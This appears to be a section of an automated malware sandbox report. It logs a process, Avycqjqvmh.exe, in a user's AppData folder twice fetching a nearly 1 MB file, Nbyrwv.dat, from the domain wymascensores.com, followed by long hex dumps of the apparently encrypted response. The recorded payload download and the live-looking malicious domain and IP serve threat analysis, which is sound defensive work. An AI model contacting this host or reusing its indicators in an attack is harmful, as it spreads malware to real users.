                                                        2024-10-07 07:13:32 UTC8000INData Raw: 66 08 68 55 4d 46 f7 30 7b a4 16 b2 79 cf 6a da 1a 7f db 27 1a 78 12 c7 e5 25 80 3c c6 41 ac 37 f5 94 c5 a0 aa 4b 4b 75 84 19 e6 91 96 97 79 c8 60 35 4e 4b fb 2f b1 db 49 bf 79 45 c5 38 f0 3f fb d4 33 38 cc 45 5e 63 17 01 5b 0c 5d 70 0c 02 e2 2e ef 42 6d 5d 18 76 19 4e 1a e8 8e fa 07 fa b3 a5 f4 c4 a4 66 42 ca e1 8a cf b2 94 a5 bc 7d 22 5b ff c8 00 c6 5e 8f a6 85 07 13 68 40 24 00 a9 5b 0a 4b 38 e3 d8 8f aa 7f 28 c9 a0 47 fd 26 02 92 36 53 76 05 42 37 a7 c5 90 1f a6 56 74 51 d3 dc 3c cf a4 44 45 e1 28 95 89 93 7e 45 60 28 ae 3f 2d f2 f6 a0 a8 16 90 48 1d d6 48 c8 37 d1 0c 82 83 3c 0f a7 42 b3 d6 52 1a d7 ef 7f 96 96 e6 b5 cb ba fa ef 32 aa 89 98 fb 29 5d 36 3d 53 2b 5c 2c 74 fa a9 6d 0d 2b 1e 82 2b 76 6b a9 c0 2b dd de 05 64 b2 01 e7 17 fe e0 1c a6 8d 23
                                                        Data Ascii: fhUMF0{yj'x%<A7KKuy`5NK/IyE8?38E^c[]p.Bm]vNfB}"[^h@$[K8(G&6SvB7VtQ<DE(~E`(?-HH7<BR2)]6=S+\,tm++vk+d#
                                                        2024-10-07 07:13:32 UTC8000INData Raw: d9 ef 29 17 70 2f de ea a8 62 55 91 05 a1 02 01 b8 06 cb e5 74 8d fb 98 28 15 69 96 4e 71 99 5c 8f 46 16 67 98 0a 8f 58 7d 94 e9 96 28 a2 11 17 58 bd 19 42 81 f4 51 82 00 8a f8 39 2e 9f 72 6d ff 3f 7a 0f 5c 79 2c 88 21 7d bf 38 61 43 81 19 a7 c8 d4 05 7a 93 b1 04 1b c4 16 04 2c bc 3c 35 a2 5f 90 4c 2e a2 75 4c ad 19 26 29 3c 0a 8f 4b e2 8f 9b e8 b4 92 d3 28 7b e7 c8 67 c2 f3 4f 3e 18 ee d8 fe 2f 4e 68 d3 e5 ec 50 02 d5 af 86 59 39 e5 f8 ad b9 20 48 37 bb 09 3c bb 89 e5 c0 de ac fc 38 76 f1 ae db 15 36 8a 88 db a2 f4 35 b6 57 a8 2e 5a 6d 7c b5 b5 ac 3d 51 26 ee 55 ab c7 ff 04 e3 0b 9e 53 f1 6c 96 78 ce 26 47 0c dc 6c 00 8f 1b c9 a1 61 14 41 88 16 46 f4 7b 31 1f 05 8a 88 0c a8 ff ac c0 2b 3f e5 f4 ae e2 47 3b d6 6c df a6 5e 1d f0 0e 28 be e3 cf 40 e5 78 0c
                                                        Data Ascii: )p/bUt(iNq\FgX}(XBQ9.rm?z\y,!}8aCz,<5_L.uL&)<K({gO>/NhPY9 H7<8v65W.Zm|=Q&USlx&GlaAF{1+?G;l^(@x
                                                        2024-10-07 07:13:32 UTC8000INData Raw: 8f 2f 95 46 49 be 29 26 1a 22 80 12 05 0d 98 c3 9c e9 06 93 c6 6b 97 05 5f 3e e6 2f e2 a4 aa e1 62 d4 0f 19 e4 ae 70 9a d4 46 64 75 ef 59 07 61 28 f4 76 0c 73 68 f2 a6 ef 98 0b b1 23 87 f3 5f a7 bd 00 71 8b e3 42 9f 0d 0c 3b b8 5c d0 9c b0 cb 5d d3 9f 84 ac 99 eb f6 50 08 5c ad 34 19 9d ec a9 75 ee c3 f8 d9 eb 7e c7 da ba bd 26 29 54 d7 5a 8f 96 0d b5 ec 0a ad 0a 5f 4d 24 f9 fa 08 84 b2 41 25 03 c3 76 00 a9 41 ed c6 47 bc 8c 8a 96 91 34 34 84 72 05 8d 5f d4 c9 16 08 50 2a 88 21 83 e9 e4 64 bf 06 13 30 09 14 d9 d0 fd 92 70 86 96 b9 44 6c 8a 66 f9 14 bb 25 ba bc 99 85 76 e0 49 b4 37 16 88 a8 1d a5 f1 dc c9 6f aa 5f 7f 11 9d d8 2d 58 12 f8 34 b2 f7 6f eb 0d 51 a7 85 56 26 a9 75 22 61 10 a2 3a ce 61 82 32 21 7c 1d c8 4e 9d 1f 0d 20 6f b4 20 06 77 fd be 2a d9
                                                        Data Ascii: /FI)&"k_>/bpFduYa(vsh#_qB;\]P\4u~&)TZ_M$A%vAG44r_P*!d0pDlf%vI7o_-X4oQV&u"a:a2!|N o w*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.44973367.212.175.1624432472C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:13:43 UTC83OUTGET /index/Nbyrwv.dat HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:13:43 UTC183INHTTP/1.1 200 OK
                                                        Date: Mon, 07 Oct 2024 07:13:43 GMT
                                                        Server: Apache
                                                        Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 956424
                                                        Connection: close
                                                        2024-10-07 07:13:43 UTC8009INData Raw: 6e 68 47 45 2f 44 6a 64 87 22 5e 8c 9a 0f 6f b1 1b f9 d2 49 0c 2d 49 7c ab 8d 53 d1 70 06 f5 7a f6 f6 98 15 20 71 a0 71 34 1a a4 8c 09 40 86 30 62 dd cf bf 22 99 e3 04 49 e6 49 87 5e de 5c 2b 08 06 9f db 9e 9d 36 22 07 80 f4 81 c2 da 20 a8 de 97 f8 f1 5a f8 58 eb 3e 7c 7e cd dc 8a 6d bb 90 dc e9 60 63 4c ca 93 16 53 43 88 cc 21 57 27 20 b6 97 24 db 85 f5 dc ce b4 00 94 0c 17 7b d8 73 e6 d9 32 fe f8 27 be 63 b5 c8 b3 3a aa 72 31 62 ab 52 7f 3e 45 e2 d6 df 60 84 d0 65 42 fd 54 63 a1 c1 1e 5a ae 0b fe 62 eb a5 dd 9c dd 8b ca c7 b9 2a a0 72 f5 0c b2 03 b4 fa e2 cd 6a cf 1b 0f 63 b1 bf de f5 ac ab ae b4 f2 6d f8 cf 5a 88 cd b6 a1 a7 55 eb 10 f5 5c be 95 85 a1 38 7d 33 11 57 da af 98 34 4e aa fe 5c ba 7b 37 9d f2 27 f7 ef e2 23 20 15 01 43 bb 75 0d 80 51 26 4a
                                                        Data Ascii: nhGE/Djd"^oI-I|Spz qq4@0b"II^\+6" ZX>|~m`cLSC!W' ${s2'c:r1bR>E`eBTcZb*rjcmZU\8}3W4N\{7'# CuQ&J
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 0f a4 bc ef 14 1b 6b cd db ea 7e d5 d8 29 a2 b6 fc c5 23 30 1b 9b 19 c8 75 d7 79 fb 8e a9 a5 dd 6c 8d 8a a7 c6 7e a4 81 b7 65 a8 0c 9a c9 96 20 e9 05 ad 28 dd 20 31 a4 d5 0c 3e ee 1b 87 be 8a ee 34 43 c0 9a b7 1c 49 44 ec f4 75 73 15 f7 61 99 94 df db 78 9c 9f 7b 27 a7 6e 04 bf c3 22 5e bf 26 55 00 d2 7e b9 0e cd 34 96 66 82 d5 47 e1 83 2a cc ac a4 d5 03 67 f7 ac ec 1d b1 13 a6 c9 af fd f0 f2 10 3f 56 95 ca d4 8b 0e cb 99 8c e0 83 47 80 45 12 be 67 df 8b 11 55 d3 78 fc 30 3e 52 b6 e6 9d 48 4e d5 cc 12 a6 93 b5 cb 5d 54 28 7c ce a4 e5 a9 b8 1f 66 97 cb 4d a8 10 de ad b5 fb 41 bc 33 d1 20 e8 22 64 cd b5 7f 1a b3 84 5b 70 79 e3 31 e5 1e 59 2b 28 f4 f0 45 ee 9e e9 36 29 29 aa ce 19 d0 c9 3c 06 89 a7 db 0a d0 f0 63 7b 6a a0 6b 5c 64 dc 10 f4 b8 ad 73 6c c1 12
                                                        Data Ascii: k~)#0uyl~e ( 1>4CIDusax{'n"^&U~4fG*g?VGEgUx0>RHN]T(|fMA3 "d[py1Y+(E6))<c{jk\dsl
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 88 7c f2 ae 91 43 78 dd f1 66 12 6d 28 64 b5 49 87 b7 05 e7 ef 2d d8 29 46 20 9c 59 0f 62 df e8 6a f4 52 50 42 69 54 4c b1 76 93 af 6a 30 f9 7f 95 90 84 01 2b 22 dd 0c 3a d1 b5 cb 46 86 7d 50 87 df 47 99 19 da ab ab a1 26 43 9f 35 37 62 be a8 2d ff d1 da 8a fa 9b a6 2a 31 fb ed 27 6c fd 73 6d f3 25 96 72 71 ff e0 52 21 c2 3d 9c cb 85 1f 48 b5 f7 79 db f8 ad a1 2f d2 fb c1 ad 06 ba b2 c3 98 8c 83 28 04 f4 10 65 d2 cd 35 13 08 2d 00 9c 45 bc ec 08 ba 6c b0 95 0c d4 17 67 25 a8 2a db bb 58 eb 55 2e 7e 2e 54 a5 a0 75 2c c1 fa fe f6 1e 1e 16 f4 a6 f3 23 31 6a d6 39 08 0b 6f 6b c2 53 60 dd 6e c1 53 b7 ee ba 14 08 58 79 a9 a6 6c 75 11 fc 46 0d ea 7a 3d 4d 81 07 cb 8a 01 8a c4 9e b5 0e ca 76 49 ee 75 ca cc bb 3a 60 bc f8 5d 7b ca 96 33 92 bb ff 62 02 d1 16 23 a3
                                                        Data Ascii: |Cxfm(dI-)F YbjRPBiTLvj0+":F}PG&C57b-*1'lsm%rqR!=Hy/(e5-Elg%*XU.~.Tu,#1j9okS`nSXyluFz=MvIu:`]{3b#
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 35 df e7 e2 54 2e 40 25 56 25 0e 2b cb 27 76 fa 12 25 9a 06 16 bb 41 b6 84 b7 3a d9 33 bc d3 21 a4 e6 ec ac ae a1 34 9e a7 44 4b db c0 b2 5d bd 79 77 1c 22 7e 0a a9 ac 15 ca 11 52 8c e1 a9 d9 2c 8e c6 08 79 ce 50 ae 14 50 8a a7 91 0a 5b aa 3b de ad a1 24 b6 4a 0d 28 12 83 08 e6 70 99 1e 38 9a 8b 9a b0 04 dd 25 21 34 9f 94 c9 98 9b 2d fe 31 e0 21 8f 36 c7 3c 17 d9 20 4b 4d 02 42 2a 18 00 55 f1 91 03 8a 7e fe da b0 1a 93 27 3d 25 fc 13 6d 7b 04 28 67 77 aa 3a 86 b4 59 d7 bf b0 7f 9b 0e fe fd 32 5d 83 1b c3 13 f8 8f f5 97 c1 5a 86 af 7b 83 20 43 39 96 c4 8e f7 b2 94 e9 fc 33 97 08 b8 24 30 c9 dc f1 0f 9b 09 ad 92 b4 2b ac bb 59 45 bb 4b 45 3f 79 51 15 ef 9b b3 b4 dc 2e f4 50 d3 83 64 77 fd 3c ee 55 cc 98 5f aa b8 6a a3 2b ae 1d 0f f5 ac dc 5b 08 6e 6a 55 12
                                                        Data Ascii: 5T.@%V%+'v%A:3!4DK]yw"~R,yPP[;$J(p8%!4-1!6< KMB*U~'=%m{(gw:Y2]Z{ C93$0+YEKE?yQ.Pdw<U_j+[njU
                                                        2024-10-07 07:13:43 UTC8000INData Raw: f8 1f bf 66 e9 b1 94 f7 22 00 d6 5a 05 24 8d ea 70 88 6d b5 13 e7 d8 e4 03 fe 21 c3 37 53 17 83 01 48 13 4f b4 6d 8a 8b 6a 1d 31 bc fd fa eb 7c c2 3c e8 ae e9 9f 6b b1 7c 0d c3 6d d9 b1 97 9a de c7 f0 2f c9 6e 8f fc d1 dd d4 55 89 f0 99 1f 49 58 ce 2a 15 23 3e c4 26 08 9a b5 71 de b4 8c 47 e4 91 12 4c ec c2 96 0f 40 19 ad b5 a7 97 f6 2c ea a9 93 bd a2 b7 a8 c6 51 4f 93 62 c3 da 19 fe 72 82 51 6c b6 60 5b de 9b 0c 2a e9 d1 5d 90 27 c1 e8 51 ea 80 6b 34 f5 d1 4f 9f 34 7c 36 f7 02 c7 7d e4 65 b7 32 f7 aa 9c 08 aa de e5 fe b5 f0 ae 1b 74 40 63 5e cf de b1 2d ac eb 2c b5 72 ef 52 1f 37 06 92 f7 51 75 3e c6 46 07 7e d9 f2 cb 7b 54 9c b0 56 9c f3 eb ef db 3b b7 2f ee e4 94 b3 ec 80 63 5f 04 db fa d5 29 17 bf 95 20 0a 7f 6e f0 8e 44 d0 5c e7 44 cd ae 1e fa 6c e8
                                                        Data Ascii: f"Z$pm!7SHOmj1|<k|m/nUIX*#>&qGL@,QObrQl`[*]'Qk4O4|6}e2t@c^-,rR7Qu>F~{TV;/c_) nD\Dl
                                                        2024-10-07 07:13:43 UTC8000INData Raw: e5 2e 38 26 28 79 85 02 7c 66 c3 46 13 33 31 9a cc 0c 2d 11 3b 3d e8 b6 1f f7 3b 6b e0 89 9b d7 4b fd 7c eb 9d 2e f4 0e 54 d8 1b 76 40 c5 2e 3d 25 b9 61 e1 9c 83 11 09 56 ad e0 98 c1 00 11 71 36 ed e4 c1 e2 52 6c 61 08 80 04 bc d1 08 5c 26 02 ec 89 d4 36 b1 91 df c6 ed e1 5b f0 3f 8e 9c 89 42 32 43 a5 c0 04 bf 9e 31 40 b9 0a f6 eb f9 bc c0 82 ce 44 df 6d e3 7e 6d f5 fb c3 f8 51 f8 93 cd 92 98 e1 75 b9 56 fb c6 95 29 48 80 38 e9 32 23 92 58 25 38 e8 ca c9 3e 1e c6 a6 b5 13 54 6f 84 73 0a eb 24 64 73 40 9e 61 54 a1 60 cb 27 d1 8d 4a c9 71 92 63 a0 a4 08 21 21 64 cc 9e 3b 6d 00 2f 8f ff 75 7a 48 48 08 93 4f 37 58 44 9c 87 b6 b0 54 a5 5a c2 6a 9d 0c 76 83 82 0d a7 66 04 61 18 05 06 e8 bd de 91 7e f1 67 1b dc 6b 8d 19 38 e3 2c 27 b4 5f 1a d2 f8 55 1e c2 1a fb
                                                        Data Ascii: .8&(y|fF31-;=;kK|.Tv@.=%aVq6Rla\&6[?B2C1@Dm~mQuV)H82#X%8>Tos$ds@aT`'Jqc!!d;m/uzHHO7XDTZjvfa~gk8,'_U
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 39 3f 25 16 f0 f1 87 af bd 57 6b 0a 7b ab e3 32 f9 7d b7 11 32 e0 34 a6 e1 3b 92 ad f3 9a 37 71 4a 3c 2a aa 03 74 61 08 ae a7 61 ad 14 b2 b5 41 2f 7d ba 39 5f 61 38 b2 38 20 0c 3d e8 34 f8 b8 a4 fc 00 4a 8b d6 d8 b8 4b 02 a4 1d c9 c0 63 be e4 12 fa 8e 4c 23 bf ba 8c 1c 82 61 6f 80 a6 4c 62 72 6a 50 7a 6a cc 06 5d 81 5b 66 ea 82 4d b3 4e b6 14 63 7e 27 84 69 7e 6d 71 7e ef 43 43 e3 17 af b1 e8 c9 95 2f 63 9d fb 2c bb 70 9d 2d 38 b3 4b 07 e2 7a ae 89 9e d4 fc 7b 74 e2 18 68 af 43 e0 5e a5 b4 67 cc 36 c5 08 03 35 ca 78 2e cf f4 9e 08 1a a4 09 41 95 18 4d 12 45 02 21 12 5e 0f ec 3e dd 52 22 1d a4 2f ef 31 dc 75 4a dc fa 01 f4 13 ef 7b 44 20 f6 22 c4 f4 d1 21 68 31 a4 ca 13 6a fe 57 84 2e 56 51 77 6b 37 04 c3 01 06 3e a7 70 93 67 d5 44 1e 93 43 5e de 49 1d 46
                                                        Data Ascii: 9?%Wk{2}24;7qJ<*taaA/}9_a88 =4JKcL#aoLbrjPzj][fMNc~'i~mq~CC/c,p-8Kz{thC^g65x.AME!^>R"/1uJ{D "!h1jW.VQwk7>pgDC^IF
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 66 08 68 55 4d 46 f7 30 7b a4 16 b2 79 cf 6a da 1a 7f db 27 1a 78 12 c7 e5 25 80 3c c6 41 ac 37 f5 94 c5 a0 aa 4b 4b 75 84 19 e6 91 96 97 79 c8 60 35 4e 4b fb 2f b1 db 49 bf 79 45 c5 38 f0 3f fb d4 33 38 cc 45 5e 63 17 01 5b 0c 5d 70 0c 02 e2 2e ef 42 6d 5d 18 76 19 4e 1a e8 8e fa 07 fa b3 a5 f4 c4 a4 66 42 ca e1 8a cf b2 94 a5 bc 7d 22 5b ff c8 00 c6 5e 8f a6 85 07 13 68 40 24 00 a9 5b 0a 4b 38 e3 d8 8f aa 7f 28 c9 a0 47 fd 26 02 92 36 53 76 05 42 37 a7 c5 90 1f a6 56 74 51 d3 dc 3c cf a4 44 45 e1 28 95 89 93 7e 45 60 28 ae 3f 2d f2 f6 a0 a8 16 90 48 1d d6 48 c8 37 d1 0c 82 83 3c 0f a7 42 b3 d6 52 1a d7 ef 7f 96 96 e6 b5 cb ba fa ef 32 aa 89 98 fb 29 5d 36 3d 53 2b 5c 2c 74 fa a9 6d 0d 2b 1e 82 2b 76 6b a9 c0 2b dd de 05 64 b2 01 e7 17 fe e0 1c a6 8d 23
                                                        Data Ascii: fhUMF0{yj'x%<A7KKuy`5NK/IyE8?38E^c[]p.Bm]vNfB}"[^h@$[K8(G&6SvB7VtQ<DE(~E`(?-HH7<BR2)]6=S+\,tm++vk+d#
                                                        2024-10-07 07:13:43 UTC8000INData Raw: d9 ef 29 17 70 2f de ea a8 62 55 91 05 a1 02 01 b8 06 cb e5 74 8d fb 98 28 15 69 96 4e 71 99 5c 8f 46 16 67 98 0a 8f 58 7d 94 e9 96 28 a2 11 17 58 bd 19 42 81 f4 51 82 00 8a f8 39 2e 9f 72 6d ff 3f 7a 0f 5c 79 2c 88 21 7d bf 38 61 43 81 19 a7 c8 d4 05 7a 93 b1 04 1b c4 16 04 2c bc 3c 35 a2 5f 90 4c 2e a2 75 4c ad 19 26 29 3c 0a 8f 4b e2 8f 9b e8 b4 92 d3 28 7b e7 c8 67 c2 f3 4f 3e 18 ee d8 fe 2f 4e 68 d3 e5 ec 50 02 d5 af 86 59 39 e5 f8 ad b9 20 48 37 bb 09 3c bb 89 e5 c0 de ac fc 38 76 f1 ae db 15 36 8a 88 db a2 f4 35 b6 57 a8 2e 5a 6d 7c b5 b5 ac 3d 51 26 ee 55 ab c7 ff 04 e3 0b 9e 53 f1 6c 96 78 ce 26 47 0c dc 6c 00 8f 1b c9 a1 61 14 41 88 16 46 f4 7b 31 1f 05 8a 88 0c a8 ff ac c0 2b 3f e5 f4 ae e2 47 3b d6 6c df a6 5e 1d f0 0e 28 be e3 cf 40 e5 78 0c
                                                        Data Ascii: )p/bUt(iNq\FgX}(XBQ9.rm?z\y,!}8aCz,<5_L.uL&)<K({gO>/NhPY9 H7<8v65W.Zm|=Q&USlx&GlaAF{1+?G;l^(@x
                                                        2024-10-07 07:13:43 UTC8000INData Raw: 8f 2f 95 46 49 be 29 26 1a 22 80 12 05 0d 98 c3 9c e9 06 93 c6 6b 97 05 5f 3e e6 2f e2 a4 aa e1 62 d4 0f 19 e4 ae 70 9a d4 46 64 75 ef 59 07 61 28 f4 76 0c 73 68 f2 a6 ef 98 0b b1 23 87 f3 5f a7 bd 00 71 8b e3 42 9f 0d 0c 3b b8 5c d0 9c b0 cb 5d d3 9f 84 ac 99 eb f6 50 08 5c ad 34 19 9d ec a9 75 ee c3 f8 d9 eb 7e c7 da ba bd 26 29 54 d7 5a 8f 96 0d b5 ec 0a ad 0a 5f 4d 24 f9 fa 08 84 b2 41 25 03 c3 76 00 a9 41 ed c6 47 bc 8c 8a 96 91 34 34 84 72 05 8d 5f d4 c9 16 08 50 2a 88 21 83 e9 e4 64 bf 06 13 30 09 14 d9 d0 fd 92 70 86 96 b9 44 6c 8a 66 f9 14 bb 25 ba bc 99 85 76 e0 49 b4 37 16 88 a8 1d a5 f1 dc c9 6f aa 5f 7f 11 9d d8 2d 58 12 f8 34 b2 f7 6f eb 0d 51 a7 85 56 26 a9 75 22 61 10 a2 3a ce 61 82 32 21 7c 1d c8 4e 9d 1f 0d 20 6f b4 20 06 77 fd be 2a d9
                                                        Data Ascii: /FI)&"k_>/bpFduYa(vsh#_qB;\]P\4u~&)TZ_M$A%vAG44r_P*!d0pDlf%vI7o_-X4oQV&u"a:a2!|N o w*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.44974267.212.175.162443928C:\Users\user\AppData\Roaming\Avycqjqvmh.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-07 07:13:52 UTC83OUTGET /index/Nbyrwv.dat HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:13:52 UTC183INHTTP/1.1 200 OK
                                                        Date: Mon, 07 Oct 2024 07:13:52 GMT
                                                        Server: Apache
                                                        Last-Modified: Fri, 04 Oct 2024 06:58:29 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 956424
                                                        Connection: close
                                                        2024-10-07 07:13:52 UTC8009INData Raw: 6e 68 47 45 2f 44 6a 64 87 22 5e 8c 9a 0f 6f b1 1b f9 d2 49 0c 2d 49 7c ab 8d 53 d1 70 06 f5 7a f6 f6 98 15 20 71 a0 71 34 1a a4 8c 09 40 86 30 62 dd cf bf 22 99 e3 04 49 e6 49 87 5e de 5c 2b 08 06 9f db 9e 9d 36 22 07 80 f4 81 c2 da 20 a8 de 97 f8 f1 5a f8 58 eb 3e 7c 7e cd dc 8a 6d bb 90 dc e9 60 63 4c ca 93 16 53 43 88 cc 21 57 27 20 b6 97 24 db 85 f5 dc ce b4 00 94 0c 17 7b d8 73 e6 d9 32 fe f8 27 be 63 b5 c8 b3 3a aa 72 31 62 ab 52 7f 3e 45 e2 d6 df 60 84 d0 65 42 fd 54 63 a1 c1 1e 5a ae 0b fe 62 eb a5 dd 9c dd 8b ca c7 b9 2a a0 72 f5 0c b2 03 b4 fa e2 cd 6a cf 1b 0f 63 b1 bf de f5 ac ab ae b4 f2 6d f8 cf 5a 88 cd b6 a1 a7 55 eb 10 f5 5c be 95 85 a1 38 7d 33 11 57 da af 98 34 4e aa fe 5c ba 7b 37 9d f2 27 f7 ef e2 23 20 15 01 43 bb 75 0d 80 51 26 4a
                                                        Data Ascii: nhGE/Djd"^oI-I|Spz qq4@0b"II^\+6" ZX>|~m`cLSC!W' ${s2'c:r1bR>E`eBTcZb*rjcmZU\8}3W4N\{7'# CuQ&J
                                                        2024-10-07 07:13:52 UTC8000INData Raw: 0f a4 bc ef 14 1b 6b cd db ea 7e d5 d8 29 a2 b6 fc c5 23 30 1b 9b 19 c8 75 d7 79 fb 8e a9 a5 dd 6c 8d 8a a7 c6 7e a4 81 b7 65 a8 0c 9a c9 96 20 e9 05 ad 28 dd 20 31 a4 d5 0c 3e ee 1b 87 be 8a ee 34 43 c0 9a b7 1c 49 44 ec f4 75 73 15 f7 61 99 94 df db 78 9c 9f 7b 27 a7 6e 04 bf c3 22 5e bf 26 55 00 d2 7e b9 0e cd 34 96 66 82 d5 47 e1 83 2a cc ac a4 d5 03 67 f7 ac ec 1d b1 13 a6 c9 af fd f0 f2 10 3f 56 95 ca d4 8b 0e cb 99 8c e0 83 47 80 45 12 be 67 df 8b 11 55 d3 78 fc 30 3e 52 b6 e6 9d 48 4e d5 cc 12 a6 93 b5 cb 5d 54 28 7c ce a4 e5 a9 b8 1f 66 97 cb 4d a8 10 de ad b5 fb 41 bc 33 d1 20 e8 22 64 cd b5 7f 1a b3 84 5b 70 79 e3 31 e5 1e 59 2b 28 f4 f0 45 ee 9e e9 36 29 29 aa ce 19 d0 c9 3c 06 89 a7 db 0a d0 f0 63 7b 6a a0 6b 5c 64 dc 10 f4 b8 ad 73 6c c1 12
                                                        Data Ascii: k~)#0uyl~e ( 1>4CIDusax{'n"^&U~4fG*g?VGEgUx0>RHN]T(|fMA3 "d[py1Y+(E6))<c{jk\dsl
                                                        2024-10-07 07:13:52 UTC8000INData Raw: 88 7c f2 ae 91 43 78 dd f1 66 12 6d 28 64 b5 49 87 b7 05 e7 ef 2d d8 29 46 20 9c 59 0f 62 df e8 6a f4 52 50 42 69 54 4c b1 76 93 af 6a 30 f9 7f 95 90 84 01 2b 22 dd 0c 3a d1 b5 cb 46 86 7d 50 87 df 47 99 19 da ab ab a1 26 43 9f 35 37 62 be a8 2d ff d1 da 8a fa 9b a6 2a 31 fb ed 27 6c fd 73 6d f3 25 96 72 71 ff e0 52 21 c2 3d 9c cb 85 1f 48 b5 f7 79 db f8 ad a1 2f d2 fb c1 ad 06 ba b2 c3 98 8c 83 28 04 f4 10 65 d2 cd 35 13 08 2d 00 9c 45 bc ec 08 ba 6c b0 95 0c d4 17 67 25 a8 2a db bb 58 eb 55 2e 7e 2e 54 a5 a0 75 2c c1 fa fe f6 1e 1e 16 f4 a6 f3 23 31 6a d6 39 08 0b 6f 6b c2 53 60 dd 6e c1 53 b7 ee ba 14 08 58 79 a9 a6 6c 75 11 fc 46 0d ea 7a 3d 4d 81 07 cb 8a 01 8a c4 9e b5 0e ca 76 49 ee 75 ca cc bb 3a 60 bc f8 5d 7b ca 96 33 92 bb ff 62 02 d1 16 23 a3
                                                        Data Ascii: |Cxfm(dI-)F YbjRPBiTLvj0+":F}PG&C57b-*1'lsm%rqR!=Hy/(e5-Elg%*XU.~.Tu,#1j9okS`nSXyluFz=MvIu:`]{3b#
                                                        2024-10-07 07:13:52 UTC8000INData Raw: 35 df e7 e2 54 2e 40 25 56 25 0e 2b cb 27 76 fa 12 25 9a 06 16 bb 41 b6 84 b7 3a d9 33 bc d3 21 a4 e6 ec ac ae a1 34 9e a7 44 4b db c0 b2 5d bd 79 77 1c 22 7e 0a a9 ac 15 ca 11 52 8c e1 a9 d9 2c 8e c6 08 79 ce 50 ae 14 50 8a a7 91 0a 5b aa 3b de ad a1 24 b6 4a 0d 28 12 83 08 e6 70 99 1e 38 9a 8b 9a b0 04 dd 25 21 34 9f 94 c9 98 9b 2d fe 31 e0 21 8f 36 c7 3c 17 d9 20 4b 4d 02 42 2a 18 00 55 f1 91 03 8a 7e fe da b0 1a 93 27 3d 25 fc 13 6d 7b 04 28 67 77 aa 3a 86 b4 59 d7 bf b0 7f 9b 0e fe fd 32 5d 83 1b c3 13 f8 8f f5 97 c1 5a 86 af 7b 83 20 43 39 96 c4 8e f7 b2 94 e9 fc 33 97 08 b8 24 30 c9 dc f1 0f 9b 09 ad 92 b4 2b ac bb 59 45 bb 4b 45 3f 79 51 15 ef 9b b3 b4 dc 2e f4 50 d3 83 64 77 fd 3c ee 55 cc 98 5f aa b8 6a a3 2b ae 1d 0f f5 ac dc 5b 08 6e 6a 55 12
                                                        Data Ascii: 5T.@%V%+'v%A:3!4DK]yw"~R,yPP[;$J(p8%!4-1!6< KMB*U~'=%m{(gw:Y2]Z{ C93$0+YEKE?yQ.Pdw<U_j+[njU
                                                        2024-10-07 07:13:52 UTC8000INData Raw: f8 1f bf 66 e9 b1 94 f7 22 00 d6 5a 05 24 8d ea 70 88 6d b5 13 e7 d8 e4 03 fe 21 c3 37 53 17 83 01 48 13 4f b4 6d 8a 8b 6a 1d 31 bc fd fa eb 7c c2 3c e8 ae e9 9f 6b b1 7c 0d c3 6d d9 b1 97 9a de c7 f0 2f c9 6e 8f fc d1 dd d4 55 89 f0 99 1f 49 58 ce 2a 15 23 3e c4 26 08 9a b5 71 de b4 8c 47 e4 91 12 4c ec c2 96 0f 40 19 ad b5 a7 97 f6 2c ea a9 93 bd a2 b7 a8 c6 51 4f 93 62 c3 da 19 fe 72 82 51 6c b6 60 5b de 9b 0c 2a e9 d1 5d 90 27 c1 e8 51 ea 80 6b 34 f5 d1 4f 9f 34 7c 36 f7 02 c7 7d e4 65 b7 32 f7 aa 9c 08 aa de e5 fe b5 f0 ae 1b 74 40 63 5e cf de b1 2d ac eb 2c b5 72 ef 52 1f 37 06 92 f7 51 75 3e c6 46 07 7e d9 f2 cb 7b 54 9c b0 56 9c f3 eb ef db 3b b7 2f ee e4 94 b3 ec 80 63 5f 04 db fa d5 29 17 bf 95 20 0a 7f 6e f0 8e 44 d0 5c e7 44 cd ae 1e fa 6c e8
                                                        Data Ascii: f"Z$pm!7SHOmj1|<k|m/nUIX*#>&qGL@,QObrQl`[*]'Qk4O4|6}e2t@c^-,rR7Qu>F~{TV;/c_) nD\Dl
                                                        2024-10-07 07:13:52 UTC8000INData Raw: e5 2e 38 26 28 79 85 02 7c 66 c3 46 13 33 31 9a cc 0c 2d 11 3b 3d e8 b6 1f f7 3b 6b e0 89 9b d7 4b fd 7c eb 9d 2e f4 0e 54 d8 1b 76 40 c5 2e 3d 25 b9 61 e1 9c 83 11 09 56 ad e0 98 c1 00 11 71 36 ed e4 c1 e2 52 6c 61 08 80 04 bc d1 08 5c 26 02 ec 89 d4 36 b1 91 df c6 ed e1 5b f0 3f 8e 9c 89 42 32 43 a5 c0 04 bf 9e 31 40 b9 0a f6 eb f9 bc c0 82 ce 44 df 6d e3 7e 6d f5 fb c3 f8 51 f8 93 cd 92 98 e1 75 b9 56 fb c6 95 29 48 80 38 e9 32 23 92 58 25 38 e8 ca c9 3e 1e c6 a6 b5 13 54 6f 84 73 0a eb 24 64 73 40 9e 61 54 a1 60 cb 27 d1 8d 4a c9 71 92 63 a0 a4 08 21 21 64 cc 9e 3b 6d 00 2f 8f ff 75 7a 48 48 08 93 4f 37 58 44 9c 87 b6 b0 54 a5 5a c2 6a 9d 0c 76 83 82 0d a7 66 04 61 18 05 06 e8 bd de 91 7e f1 67 1b dc 6b 8d 19 38 e3 2c 27 b4 5f 1a d2 f8 55 1e c2 1a fb
                                                        Data Ascii: .8&(y|fF31-;=;kK|.Tv@.=%aVq6Rla\&6[?B2C1@Dm~mQuV)H82#X%8>Tos$ds@aT`'Jqc!!d;m/uzHHO7XDTZjvfa~gk8,'_U
